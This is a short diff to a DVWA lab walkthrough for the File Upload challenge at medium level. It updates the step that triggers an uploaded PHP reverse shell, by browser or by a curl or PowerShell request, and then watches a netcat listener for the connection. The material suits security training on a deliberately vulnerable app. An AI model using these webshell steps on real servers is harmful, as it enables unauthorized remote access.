rojounooo/hacking-dvwa/File Upload/file_upload_medium.md

 13. Navigate to the uploaded webshell

-    - The uploaded file was saved to http://<ip address>/dvwa/hackable/upload/php-reverse-shell.php
+    - The uploaded file was saved to http://localhost/dvwa/vulnerabilities/upload/hackable/upload/php-reverse-shell.php

-    - Alternatively run `curl -s http://<ip address>/dvwa/hackable/upload/php-reverse-shell.php` in another terminal
+    - Alternatively run `Invoke-WebRequest -Uri http://localhost/dvwa/vulnerabilities/upload/hackable/upload/php-reverse-shell.php -UseBasicParsing` in Powershell

 14. On the netcat listener look a connection